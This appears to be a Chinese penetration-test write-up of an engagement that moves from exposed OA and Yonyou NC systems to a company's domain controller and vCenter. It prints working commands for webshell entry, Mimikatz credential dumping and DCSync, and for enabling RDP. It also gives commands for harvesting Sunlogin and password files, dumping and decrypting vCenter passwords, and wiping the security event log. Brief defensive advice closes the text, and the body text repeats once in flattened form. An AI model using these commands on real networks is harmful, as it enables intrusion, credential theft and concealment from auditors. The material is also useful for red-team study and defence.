攻防演练 | 记一次打穿xx公司域控
字数 1516 2025-08-10 16:34:22

企业内网渗透实战:从外网到域控的完整攻防演练

1. 前期信息收集与入口点突破

1.1 资产发现与漏洞扫描

  • 使用 Ehole.exe 工具配合 Fofa 资产搜索引擎识别目标公司暴露在互联网的资产
  • 重点关注常见企业应用如:泛微OA、用友NC、H3C堡垒机等

1.2 弱口令攻击

  • 尝试常见默认凭证组合:
    • sysadmin/1
    • admin/admin
    • admin/1qazxsw2====
    • administrator/111111
  • 本例中通过 sysadmin/1 成功登录泛微OA后台

1.3 漏洞利用

  • 用友NC漏洞利用
    • 访问接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令
    • 利用用友NC任意文件上传漏洞上传Webshell(哥斯拉马)

2. 内网渗透准备

2.1 权限维持与免杀

  • 执行 tasklist /svc 识别杀软进程
  • 上传定制化的Bypass360木马实现持久化控制

2.2 隧道搭建

  • 确认机器出网情况:ping www.baidu.com
  • 使用 frp 搭建反向代理隧道
  • 配置 Proxifier 设置代理规则:
    • 指定代理端口
    • 配置认证凭据

3. 内网横向移动

3.1 快速扫描与信息收集

  • 使用 fscan 对各个C段进行扫描(建议选择非工作时间) 
    fscan -h 192.168.0.0/24
  • 重点收集:
    • 网段拓扑信息
    • 机器基本信息
    • 敏感文件(Xshell/Navicat配置等)
    • 密码本文件

3.2 密码提取技术

  • Mimikatz抓取密码
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
  • 在线破解服务:
    • https://www.cmd5.com/(付费,高成功率)
    • https://www.somd5.com/(免费)

3.3 远程桌面控制

  • 开启RDP服务
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall add portopening protocol = TCP port = 3389 name = rdp
  • 隐蔽连接方式
    • 向日葵远程控制(需获取识别码和验证码) 
      reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo
    • 配置文件路径:
      • 安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
      • 便携版:C:\ProgramData\Oray\SunloginClient\config.ini

3.4 重点目标定位

  • 优先攻击运维机(通常存储大量凭证)
  • 使用批处理脚本收集敏感信息: 
    dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*pass*"
dir /a /s /b c:\*.txt | findstr "拓扑"
dir /a /s /b c:\*.xls | findstr "密码" > C:\Users\1.txt

4. 域控攻防

4.1 域控识别

  • 使用fscan扫描AD关键字: 
    [*]192.168.10.38 
[->]D1-Prod-AD-P01 
[->]192.168.10.38
  • 确认端口:53(DNS)、389(LDAP)

4.2 域控提权技术

  1. DCSync攻击
    mimikatz.exe "lsadump::dcsync /domain:xxx /user:administrator" exit
  2. 激活禁用账户
    net user xxxx /active:yes /domain
  3. 进程注入
    • 提权至SYSTEM权限
    • 注入到域管进程

4.3 其他域渗透技术

  • NTLM中继攻击
  • 基于委派的攻击
  • 域漏洞利用(如Zerologon)

5. 云平台攻防

5.1 云管平台突破

  • 通过运维机Xshell历史记录定位数据库
  • 执行SQL查询获取hash值
  • 使用cmd5.com破解hash

5.2 Vcenter攻击

  1. 漏洞利用

    • CVE-2021-22005 RCE
    • CVE-2021-21972 文件上传
    • Log4j漏洞(通过XFF头触发)

  2. 密码提取

    cat /etc/vmware-vpx/vcdb.properties
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc

    使用解密工具:

    python decrypt.py symkey.dat password.enc pass.txt

  3. 密码重置

    /usr/lib/vmware-vmdir/bin/vdcadmintool

6. 痕迹清理

6.1 关闭RDP服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

6.2 日志清理

  • 清除安全日志: 
    wevtutil cl security
  • 删除上传的工具和脚本

防御建议

  1. 入口防御

    • 禁用默认账户和弱口令
    • 及时修补已知漏洞(如用友NC、泛微OA漏洞)

  2. 内网防护

    • 启用LSA保护
    • 限制域管账户使用范围
    • 监控异常DCSync请求

  3. 权限控制

    • 实施最小权限原则
    • 定期轮换重要凭证
    • 禁用不必要的服务(如RDP)

  4. 监控措施

    • 部署EDR解决方案
    • 监控异常横向移动行为
    • 建立完善的日志审计机制

  5. 应急响应

    • 制定完善的应急响应流程
    • 定期进行红蓝对抗演练
    • 建立密码泄露应急处理机制
企业内网渗透实战:从外网到域控的完整攻防演练 1. 前期信息收集与入口点突破 1.1 资产发现与漏洞扫描 使用 Ehole.exe 工具配合 Fofa 资产搜索引擎识别目标公司暴露在互联网的资产 重点关注常见企业应用如:泛微OA、用友NC、H3C堡垒机等 1.2 弱口令攻击 尝试常见默认凭证组合: sysadmin/1 admin/admin admin/1qazxsw2==== administrator/111111 本例中通过 sysadmin/1 成功登录泛微OA后台 1.3 漏洞利用 用友NC漏洞利用 : 访问接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令 利用用友NC任意文件上传漏洞上传Webshell(哥斯拉马) 2. 内网渗透准备 2.1 权限维持与免杀 执行 tasklist /svc 识别杀软进程 上传定制化的Bypass360木马实现持久化控制 2.2 隧道搭建 确认机器出网情况: ping www.baidu.com 使用 frp 搭建反向代理隧道 配置 Proxifier 设置代理规则: 指定代理端口 配置认证凭据 3. 内网横向移动 3.1 快速扫描与信息收集 使用 fscan 对各个C段进行扫描(建议选择非工作时间) 重点收集: 网段拓扑信息 机器基本信息 敏感文件(Xshell/Navicat配置等) 密码本文件 3.2 密码提取技术 Mimikatz抓取密码 : 在线破解服务: https://www.cmd5.com/(付费,高成功率) https://www.somd5.com/(免费) 3.3 远程桌面控制 开启RDP服务 : 隐蔽连接方式 : 向日葵远程控制(需获取识别码和验证码) 配置文件路径: 安装版: C:\Program Files\Oray\SunLogin\SunloginClient\config.ini 便携版: C:\ProgramData\Oray\SunloginClient\config.ini 3.4 重点目标定位 优先攻击运维机 (通常存储大量凭证) 使用批处理脚本收集敏感信息: 4. 域控攻防 4.1 域控识别 使用fscan扫描AD关键字: 确认端口:53(DNS)、389(LDAP) 4.2 域控提权技术 DCSync攻击 : 激活禁用账户 : 进程注入 : 提权至SYSTEM权限 注入到域管进程 4.3 其他域渗透技术 NTLM中继攻击 基于委派的攻击 域漏洞利用(如Zerologon) 5. 云平台攻防 5.1 云管平台突破 通过运维机Xshell历史记录定位数据库 执行SQL查询获取hash值 使用cmd5.com破解hash 5.2 Vcenter攻击 漏洞利用 : CVE-2021-22005 RCE CVE-2021-21972 文件上传 Log4j漏洞(通过XFF头触发) 密码提取 : 使用解密工具: 密码重置 : 6. 痕迹清理 6.1 关闭RDP服务 6.2 日志清理 清除安全日志: 删除上传的工具和脚本 防御建议 入口防御 : 禁用默认账户和弱口令 及时修补已知漏洞(如用友NC、泛微OA漏洞) 内网防护 : 启用LSA保护 限制域管账户使用范围 监控异常DCSync请求 权限控制 : 实施最小权限原则 定期轮换重要凭证 禁用不必要的服务(如RDP) 监控措施 : 部署EDR解决方案 监控异常横向移动行为 建立完善的日志审计机制 应急响应 : 制定完善的应急响应流程 定期进行红蓝对抗演练 建立密码泄露应急处理机制